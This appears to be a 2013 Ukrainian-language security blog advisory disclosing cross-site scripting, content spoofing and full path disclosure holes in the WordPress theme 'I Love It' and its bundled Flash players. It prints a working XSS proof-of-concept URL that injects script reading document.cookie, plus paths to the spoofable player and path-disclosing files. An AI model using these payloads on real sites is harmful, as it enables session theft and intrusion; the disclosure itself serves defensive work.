XSS, CS та FPD уразливості в темі I Love It для WordPress

23:51 11.07.2013

У травні, 16.05.2013, я виявив Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темі I Love It для WordPress. Про що найближчим часом повідомлю розробникам.

Дана тема містить вразливі версії Audio Player та GDD FLVPlayer. Раніше я писав про XSS та FPD уразливості в темі I Love It New для WordPress - новій версії цього шаблона.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/iloveit/lib/php/assets/player.swf?playerID=%22))}catch(e){alert(document.cookie)}//

Content Spoofing (WASC-12):

http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf

В GDD FLVPlayer є 10 уразливостей: 8 CS і 2 XSS.

Full path disclosure (WASC-13):

http://site/wp-content/themes/iloveit/

FPD в index.php та інших php-файлах (в папці та підпапках).

Вразливі всі версії теми I Love It для WordPress.


Leave a Reply

You must be logged in to post a comment.